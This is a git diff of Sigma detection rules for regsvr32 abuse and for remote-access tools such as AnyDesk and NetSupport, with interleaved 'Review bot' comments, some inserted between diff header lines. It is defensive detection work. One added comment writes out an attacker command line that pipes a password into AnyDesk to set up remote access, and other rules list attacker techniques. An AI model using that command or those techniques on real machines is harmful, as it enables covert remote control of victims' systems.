diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_remote_share.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_remote_share.yml
index 221bef63f..35da70979 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_remote_share.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_remote_share.yml
@@ -18,12 +18,13 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection_img:
- - Image|endswith: \regsvr32.exe
- - OriginalFileName: \REGSVR32.EXE
+ - Image|endswith: \regsvr32.exe
+ - OriginalFileName: \REGSVR32.EXE
selection_cli:
- CommandLine|contains: ' \\\\'
+ CommandLine|contains: ' \\\\'
condition: process_creation and (all of selection_*)
falsepositives:
- Unknown
+# Decrease to medium if this is something common in your org
level: high
ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_child_process.yml
index 9c63bf757..0f13620bc 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_child_process.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_child_process.yml
@@ -1,8 +1,8 @@
title: Potentially Suspicious Child Process Of Regsvr32
id: 6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca
related:
- - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
- type: obsoletes
+ - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
+ type: obsoletes
status: experimental
description: Detects potentially suspicious child processes of "regsvr32.exe".
references:
@@ -42,7 +42,7 @@ detection:
- \wscript.exe
filter_main_werfault:
Image|endswith: \werfault.exe
- CommandLine|contains: ' -u -p '
+ CommandLine|contains: ' -u -p '
condition: process_creation and (selection and not 1 of filter_main_*)
falsepositives:
- Unlikely, but can rarely occur. Apply additional filters accordingly.
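Review bot: In the remote_share hunk the re-indented alternative `- OriginalFileName: \REGSVR32.EXE` keeps a leading backslash, while every sibling regsvr32 rule in this commit (http_ip_pattern, network_pattern, susp_exec_path_1/2, susp_extensions, uncommon_extension) uses `- OriginalFileName: REGSVR32.EXE`. OriginalFileName is the bare PE version-resource name, so the backslashed form is an exact match that presumably never fires, leaving this rule to match on `Image|endswith` alone; the renamed-binary coverage the sibling rules have is therefore missing here. Suggest `- OriginalFileName: REGSVR32.EXE` for consistency with the rest of the set. The added `# Decrease to medium if this is something common in your org` comment is useful; placing it on the `level: high` line itself would match the inline style used in proc_creation_win_regsvr32_susp_parent.yml in this same commit.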
diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml
index c66110e9b..5c802dc22 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml
@@ -1,11 +1,10 @@
title: Regsvr32 Execution From Potential Suspicious Location
id: 9525dc73-0327-438c-8c04-13c0e037e9da
related:
- - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
- type: obsoletes
+ - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
+ type: obsoletes
status: experimental
-description: Detects execution of regsvr32 where the DLL is located in a potentially
- suspicious location.
+description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
references:
- https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
- https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
@@ -23,10 +22,10 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection_img:
- - Image|endswith: \regsvr32.exe
- - OriginalFileName: REGSVR32.EXE
+ - Image|endswith: \regsvr32.exe
+ - OriginalFileName: REGSVR32.EXE
selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
- :\ProgramData\
- :\Temp\
- :\Users\Public\
@@ -35,7 +34,6 @@ detection:
- \AppData\Roaming\
condition: process_creation and (all of selection_*)
falsepositives:
- - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%.
- Apply additional filters if necessary.
+ - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary.
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml
index 6ad50d942..558710285 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml
@@ -1,8 +1,7 @@
title: Regsvr32 Execution From Highly Suspicious Location
id: 327ff235-94eb-4f06-b9de-aaee571324be
status: experimental
-description: Detects execution of regsvr32 where the DLL is located in a highly suspicious
- locations
+description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
@@ -19,10 +18,10 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection_img:
- - Image|endswith: \regsvr32.exe
- - OriginalFileName: REGSVR32.EXE
+ - Image|endswith: \regsvr32.exe
+ - OriginalFileName: REGSVR32.EXE
selection_path_1:
- CommandLine|contains:
+ CommandLine|contains:
- :\PerfLogs\
- :\Temp\
- \Windows\Registration\CRMLog
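Review bot: The joined description in the first susp_exec_path_2 hunk carries over a number-agreement error, "a highly suspicious locations". Since the line is being rewritten anyway, the singular form would read correctly: `description: Detects execution of regsvr32 where the DLL is located in a highly suspicious location`. Metadata only; the detection block is untouched by this remark.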
@@ -41,26 +40,28 @@ detection:
- \Windows\Tasks\
- \Windows\Tracing\
selection_path_2:
- CommandLine|contains:
+ CommandLine|contains:
+ # This is to avoid collisions with CLI starting with "C:\"
- ' "C:\'
- ' C:\'
- - ' ''C:\'
+ - " 'C:\\"
- D:\
selection_exclude_known_dirs:
- CommandLine|contains:
+ CommandLine|contains:
+ # Note: add additional locations that are related to third party applications
- C:\Program Files (x86)\
- C:\Program Files\
- C:\ProgramData\
- C:\Users\
+ # Note: The space added here are to avoid collisions with the "regsvr32" binary full path
- ' C:\Windows\'
- ' "C:\Windows\'
- - ' ''C:\Windows\'
+ - " 'C:\\Windows\\"
filter_main_empty:
- CommandLine: ''
+ CommandLine: ''
filter_main_null:
- CommandLine: null
- condition: process_creation and (selection_img and (selection_path_1 or (selection_path_2
- and not selection_exclude_known_dirs)) and not 1 of filter_main_*)
+ CommandLine:
+ condition: process_creation and (selection_img and (selection_path_1 or (selection_path_2 and not selection_exclude_known_dirs)) and not 1 of filter_main_*)
falsepositives:
- Unlikely
level: high
diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_extensions.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_extensions.yml
index abdb6ec6b..4c18d5339 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_extensions.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_extensions.yml
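Review bot: `filter_main_null` now reads as a bare `CommandLine:` instead of `CommandLine: null`; a YAML parser presumably resolves both to null, but the bare key looks like an unfinished edit and hides the intent (match events where the field is absent) that the old spelling made explicit. Keeping `CommandLine: null` would be the clearer choice, and the same change appears in `filter_main_null_4688` of proc_creation_win_regsvr32_uncommon_extension.yml later in this commit. The new comment above `' C:\Windows\'` also has a grammar slip; suggest `# Note: The spaces added here are to avoid collisions with the "regsvr32" binary full path`. The quoting switch from `' ''C:\'` to `" 'C:\\"` yields the same string value, so no behavioural concern there.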
@@ -1,11 +1,10 @@
title: Regsvr32 DLL Execution With Suspicious File Extension
id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e
related:
- - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
- type: obsoletes
+ - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
+ type: obsoletes
status: experimental
-description: Detects the execution of REGSVR32.exe with DLL files masquerading as
- other files
+description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files
references:
- https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/
- https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html
@@ -25,10 +24,12 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection_img:
- - Image|endswith: \regsvr32.exe
- - OriginalFileName: REGSVR32.EXE
+ - Image|endswith: \regsvr32.exe
+ - OriginalFileName: REGSVR32.EXE
selection_cli:
- CommandLine|endswith:
+ CommandLine|endswith:
+ # Add more image extensions
+ # https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3
- .bin
- .bmp
- .cr2
diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_parent.yml
index a584e7e75..dcbd8c1bb 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_parent.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_parent.yml
@@ -1,11 +1,10 @@
title: Scripting/CommandLine Process Spawned Regsvr32
id: ab37a6ec-6068-432b-a64e-2c7bf95b1d22
related:
- - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
- type: obsoletes
+ - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
+ type: obsoletes
status: experimental
-description: Detects various command line and scripting engines/processes such as
- "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
+description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
references:
- https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
- https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
@@ -34,11 +33,10 @@ detection:
Image|endswith: \regsvr32.exe
filter_main_rpcproxy:
ParentImage: C:\Windows\System32\cmd.exe
- CommandLine|endswith: ' /s C:\Windows\System32\RpcProxy\RpcProxy.dll'
+ CommandLine|endswith: ' /s C:\Windows\System32\RpcProxy\RpcProxy.dll'
condition: process_creation and (selection and not 1 of filter_main_*)
falsepositives:
- - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often.
- Apply additional filter and exclusions as necessary
+ - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary
- Some legitimate Windows services
-level: medium
+level: medium # Can be reduced to low if you experience a ton of FP
ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml
index 8643a06be..610595b27 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml
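Review bot: The joined falsepositives entry in the second susp_parent hunk is still hard to parse: "scripts leverage legitimately often" has no object, so a reader cannot tell what is being leveraged. A clearer wording that keeps the author's meaning: `- Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts often launch regsvr32 legitimately. Apply additional filters and exclusions as necessary`. The inline `# Can be reduced to low if you experience a ton of FP` on the level line is a good pattern; the remote_share rule earlier in this commit puts the equivalent hint on its own line above `level`, so the two could be aligned.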
@@ -1,8 +1,7 @@
title: Regsvr32 DLL Execution With Uncommon Extension
id: 50919691-7302-437f-8e10-1fe088afa145
status: test
-description: Detects a "regsvr32" execution where the DLL doesn't contain a common
- file extension.
+description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.
references:
- https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
author: Florian Roth (Nextron Systems)
@@ -21,26 +20,25 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - Image|endswith: \regsvr32.exe
- - OriginalFileName: REGSVR32.EXE
+ - Image|endswith: \regsvr32.exe
+ - OriginalFileName: REGSVR32.EXE
filter_main_legit_ext:
- CommandLine|contains:
+ CommandLine|contains:
+ # Note: For better accuracy you might not want to use contains
- .ax
- .cpl
- - .dll
+ - .dll # Covers ".dll.mui"
- .ocx
filter_optional_pascal:
- CommandLine|contains: .ppl
+ CommandLine|contains: .ppl
filter_optional_avg:
- CommandLine|contains: .bav
+ CommandLine|contains: .bav
filter_main_null_4688:
- CommandLine: null
+ CommandLine:
filter_main_empty_4688:
- CommandLine: ''
- condition: process_creation and (selection and not 1 of filter_main_* and not
- 1 of filter_optional_*)
+ CommandLine: ''
+ condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
falsepositives:
- - Other legitimate extensions currently not in the list either from third party
- or specific Windows components.
+ - Other legitimate extensions currently not in the list either from third party or specific Windows components.
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_software_ultraviewer.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_software_ultraviewer.yml
index 1a11eb6d6..e380d629b 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_software_ultraviewer.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_software_ultraviewer.yml
@@ -1,18 +1,10 @@
title: Use of UltraViewer Remote Access Software
id: 88656cec-6c3b-487c-82c0-f73ebb805503
status: test
-description: 'An adversary may use legitimate desktop support and remote access software,
- such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive
- command and control channel to target systems within networks.
-
- These services are commonly used as legitimate technical support software, and
- may be allowed by application control within a target environment.
-
- Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared
- with other legitimate software commonly used by adversaries. (Citation: Symantec
- Living off the Land)
-
- '
+description: |
+ An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+ These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+ Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md
author: frack113
@@ -29,9 +21,9 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - Product: UltraViewer
- - Company: DucFabulous Co,ltd
- - OriginalFileName: UltraViewer_Desktop.exe
+ - Product: UltraViewer
+ - Company: DucFabulous Co,ltd
+ - OriginalFileName: UltraViewer_Desktop.exe
condition: process_creation and selection
falsepositives:
- Legitimate use
diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk.yml
index e35f8f5a4..00befd485 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk.yml
@@ -2,20 +2,12 @@ title: Remote Access Tool - AnyDesk Execution
id: b52e84a3-029e-4529-b09b-71d19dd27e94
status: test
related:
- - id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86
- type: similar
-description: 'An adversary may use legitimate desktop support and remote access software,
- such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive
- command and control channel to target systems within networks.
-
- These services are commonly used as legitimate technical support software, and
- may be allowed by application control within a target environment.
-
- Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared
- with other legitimate software commonly used by adversaries. (Citation: Symantec
- Living off the Land)
-
- '
+ - id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86
+ type: similar
+description: |
+ An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+ These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+ Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows
author: frack113
@@ -33,10 +25,10 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - Image|endswith: \AnyDesk.exe
- - Description: AnyDesk
- - Product: AnyDesk
- - Company: AnyDesk Software GmbH
+ - Image|endswith: \AnyDesk.exe
+ - Description: AnyDesk
+ - Product: AnyDesk
+ - Company: AnyDesk Software GmbH
condition: process_creation and selection
falsepositives:
- Legitimate use
diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml
index a27b9297b..790ef9097 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml
@@ -1,8 +1,7 @@
title: Remote Access Tool - AnyDesk Piped Password Via CLI
id: b1377339-fda6-477a-b455-ac0923f9ec2c
status: test
-description: Detects piping the password to an anydesk instance via CMD and the '--set-password'
- flag.
+description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.
references:
- https://redcanary.com/blog/misbehaving-rats/
author: Nasreddine Bencherchali (Nextron Systems)
@@ -20,7 +19,8 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
+ # Example: C:\WINDOWS\system32\cmd.exe /C cmd.exe /c echo J9kzQ2Y0qO |C:\ProgramData\anydesk.exe --set-password
- '/c '
- 'echo '
- .exe --set-password
diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml
index 60bef3a83..5571f8091 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml
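Review bot: The example comment added under `CommandLine|contains|all:` in the piped-password hunk embeds a literal token (`J9kzQ2Y0qO`) in the password position, which reads like a real sample value rather than an illustration and may be mistaken for an indicator to pivot on. Since the rule only keys on `'/c '`, `'echo '` and `.exe --set-password`, the example works just as well with a placeholder: `# Example: C:\WINDOWS\system32\cmd.exe /C cmd.exe /c echo <password> |C:\ProgramData\anydesk.exe --set-password`. It would also help to say in the same comment that the three tokens are matched independently (contains|all), so the example is not taken as an exact-match pattern.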
+++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml
@@ -1,12 +1,11 @@
title: Remote Access Tool - AnyDesk Silent Installation
id: 114e7f1c-f137-48c8-8f54-3088c24ce4b9
status: test
-description: Detects AnyDesk Remote Desktop silent installation. Which can be used
- by attackers to gain remote access.
+description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
references:
- https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20
- https://support.anydesk.com/Automatic_Deployment
-author: "J\xE1n Tren\u010Dansk\xFD"
+author: Ján Trenčanský
date: 2021/08/06
modified: 2023/03/05
tags:
@@ -21,7 +20,7 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- --install
- --start-with-win
- --silent
diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml
index bcdc49b3c..4e1578aaa 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml
@@ -1,21 +1,13 @@
title: Remote Access Tool - Anydesk Execution From Suspicious Folder
id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86
related:
- - id: b52e84a3-029e-4529-b09b-71d19dd27e94
- type: similar
+ - id: b52e84a3-029e-4529-b09b-71d19dd27e94
+ type: similar
status: test
-description: 'An adversary may use legitimate desktop support and remote access software,
- such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive
- command and control channel to target systems within networks.
-
- These services are commonly used as legitimate technical support software, and
- may be allowed by application control within a target environment.
-
- Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared
- with other legitimate software commonly used by adversaries. (Citation: Symantec
- Living off the Land)
-
- '
+description: |
+ An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+ These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+ Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows
author: Florian Roth (Nextron Systems)
@@ -33,10 +25,10 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - Image|endswith: \AnyDesk.exe
- - Description: AnyDesk
- - Product: AnyDesk
- - Company: AnyDesk Software GmbH
+ - Image|endswith: \AnyDesk.exe
+ - Description: AnyDesk
+ - Product: AnyDesk
+ - Company: AnyDesk Software GmbH
filter:
Image|contains:
- \AppData\
diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml
index e07c4656e..0f0181526 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml
@@ -1,18 +1,10 @@
title: Remote Access Tool - GoToAssist Execution
id: b6d98a4f-cef0-4abf-bbf6-24132854a83d
status: test
-description: 'An adversary may use legitimate desktop support and remote access software,
- such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive
- command and control channel to target systems within networks.
-
- These services are commonly used as legitimate technical support software, and
- may be allowed by application control within a target environment.
-
- Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared
- with other legitimate software commonly used by adversaries. (Citation: Symantec
- Living off the Land)
-
- '
+description: |
+ An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+ These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+ Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows
author: frack113
@@ -30,9 +22,9 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - Description: GoTo Opener
- - Product: GoTo Opener
- - Company: LogMeIn, Inc.
+ - Description: GoTo Opener
+ - Product: GoTo Opener
+ - Company: LogMeIn, Inc.
condition: process_creation and selection
falsepositives:
- Legitimate use
diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_logmein.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_logmein.yml
index 04eec75fa..0f8db7d7d 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_logmein.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_logmein.yml
@@ -1,18 +1,10 @@
title: Remote Access Tool - LogMeIn Execution
id: d85873ef-a0f8-4c48-a53a-6b621f11729d
status: test
-description: 'An adversary may use legitimate desktop support and remote access software,
- such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive
- command and control channel to target systems within networks.
-
- These services are commonly used as legitimate technical support software, and
- may be allowed by application control within a target environment.
-
- Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared
- with other legitimate software commonly used by adversaries. (Citation: Symantec
- Living off the Land)
-
- '
+description: |
+ An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+ These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+ Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows
author: frack113
@@ -30,9 +22,9 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - Description: LMIGuardianSvc
- - Product: LMIGuardianSvc
- - Company: LogMeIn, Inc.
+ - Description: LMIGuardianSvc
+ - Product: LMIGuardianSvc
+ - Company: LogMeIn, Inc.
condition: process_creation and selection
falsepositives:
- Legitimate use
diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport.yml
index 713ae61ff..85ae4c7ed 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport.yml
@@ -1,18 +1,10 @@
title: Remote Access Tool - NetSupport Execution
id: 758ff488-18d5-4cbe-8ec4-02b6285a434f
status: test
-description: 'An adversary may use legitimate desktop support and remote access software,
- such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive
- command and control channel to target systems within networks.
-
- These services are commonly used as legitimate technical support software, and
- may be allowed by application control within a target environment.
-
- Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared
- with other legitimate software commonly used by adversaries. (Citation: Symantec
- Living off the Land)
-
- '
+description: |
+ An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+ These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+ Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md
author: frack113
@@ -30,10 +22,10 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - Description: NetSupport Client Configurator
- - Product: NetSupport Remote Control
- - Company: NetSupport Ltd
- - OriginalFileName: PCICFGUI.EXE
+ - Description: NetSupport Client Configurator
+ - Product: NetSupport Remote Control
+ - Company: NetSupport Ltd
+ - OriginalFileName: PCICFGUI.EXE
condition: process_creation and selection
falsepositives:
- Legitimate use
diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml
index bb577804c..a6718570b 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml
@@ -1,8 +1,7 @@
title: Remote Access Tool - NetSupport Execution From Unusual Location
id: 37e8d358-6408-4853-82f4-98333fca7014
status: test
-description: Detects execution of client32.exe (NetSupport RAT) from an unusual location
- (outside of 'C:\Program Files')
+description: Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files')
references:
- https://redcanary.com/blog/misbehaving-rats/
author: Nasreddine Bencherchali (Nextron Systems)
@@ -19,11 +18,11 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - Image|endswith: \client32.exe
- - Product|contains: NetSupport Remote Control
- - OriginalFileName|contains: client32.exe
- - Imphash: a9d50692e95b79723f3e76fcf70d023e
- - Hashes|contains: IMPHASH=a9d50692e95b79723f3e76fcf70d023e
+ - Image|endswith: \client32.exe
+ - Product|contains: NetSupport Remote Control
+ - OriginalFileName|contains: client32.exe
+ - Imphash: a9d50692e95b79723f3e76fcf70d023e
+ - Hashes|contains: IMPHASH=a9d50692e95b79723f3e76fcf70d023e
filter:
Image|startswith:
- C:\Program Files\
diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml
index bfa718bfa..c379568c3 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml
